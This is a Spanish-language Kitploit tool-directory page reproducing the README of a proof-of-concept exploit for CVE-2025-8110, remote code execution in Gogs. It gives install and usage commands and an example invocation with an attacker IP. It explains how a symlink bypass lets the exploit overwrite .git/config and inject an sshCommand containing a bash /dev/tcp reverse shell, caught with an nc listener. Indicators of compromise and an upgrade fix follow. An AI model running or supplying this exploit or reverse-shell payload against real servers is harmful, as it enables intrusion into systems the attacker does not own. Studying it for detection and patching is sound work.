Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-8110 — Gogs RCE PoC - CVE-2025-8110 | Kitploit
Herramientas/GitHubGitHub/x4brozer/cve-2025-8110
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubx4brozer/cve-2025-8110

CVE-2025-8110

Gogs RCE PoC - CVE-2025-8110

Ver Repositorio
hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit RCE en Gogs (CVE-2025-8110)

Python License

Prueba de concepto para CVE-2025-8110 - Ejecución Remota de Código en Gogs mediante bypass de enlace simbólico e inyección de sshCommand.

Descripción

Este exploit abusa de un bypass de enlace simbólico en la API de Gogs para sobrescribir .git/config e inyectar un sshCommand malicioso que ejecuta una reverse shell.

Requisitos

  • Python 3.12+
  • Git instalado
  • Credenciales válidas de Gogs
  • Token de API de Gogs

Instalación

root@kitploit:~
git clone https://github.com/X4BROZER/CVE-2025-8110.git
cd CVE-2025-8110
pip install -r requirements.txt

Argumento Descripción -u, --url URL objetivo de Gogs (ej., http://target:3000) -U, --username Usuario de Gogs -P, --password Contraseña de Gogs -t, --token Token de API de Gogs -lh, --host Tu IP para la reverse shell -lp, --port Tu puerto para el listener -x, --proxy Habilitar proxy (localhost:8080)

Uso

Paso 1: Obtener token de API

Inicia sesión en Gogs → Configuración → Aplicaciones → Generar token

Paso 2: Iniciar listener

root@kitploit:~
nc -lvnp 4444

Paso 3: Ejecutar exploit

root@kitploit:~
python3 exploit.py -u http://target:3000 -U <USERNAME GOGS> -P <PASSWORD GOGS> -t <TOKEN> -lh <ATTACKER IP> -lp <ATTACKER PORT>

Ejemplo

root@kitploit:~
python3 exploit.py -u http://localhost:3001 -U amine -P amine -t 44f4e64a1e6353f247050055aa0d3cc13b577ac3 -lh 10.10.17.134 -lp 4444

Cómo funciona

  • Crea un repositorio con enlace simbólico a .git/config
  • Usa la API PutContents para escribir en el enlace simbólico
  • Inyecta sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' #
  • Gogs ejecuta el comando → reverse shell

Solución de problemas

Problema Solución Inicio de sesión fallido Verificar usuario/contraseña Creación de repositorio fallida Regenerar token de API Tiempo de espera agotado (read timeout) Normal - verificar listener Sin shell Verificar firewall, probar otro puerto

Indicadores de Compromiso

  • Nombres aleatorios de 8 caracteres para repositorios
  • Enlace simbólico malicious_link en repositorios
  • sshCommand en .git/config

Mitigación

Actualizar a Gogs v0.13.4 o posterior:

root@kitploit:~
wget https://dl.gogs.io/v0.13.4/gogs_v0.13.4_linux_amd64.tar.gz
tar -xzf gogs_v0.13.4_linux_amd64.tar.gz

Aviso legal

Esta herramienta es solo para fines educativos y pruebas autorizadas. El acceso no autorizado es ilegal.

Créditos

  • Descubrimiento: Wiz Research
  • PoC original: zAbuQasem
  • Exploit: X4BROZER
Descargar herramienta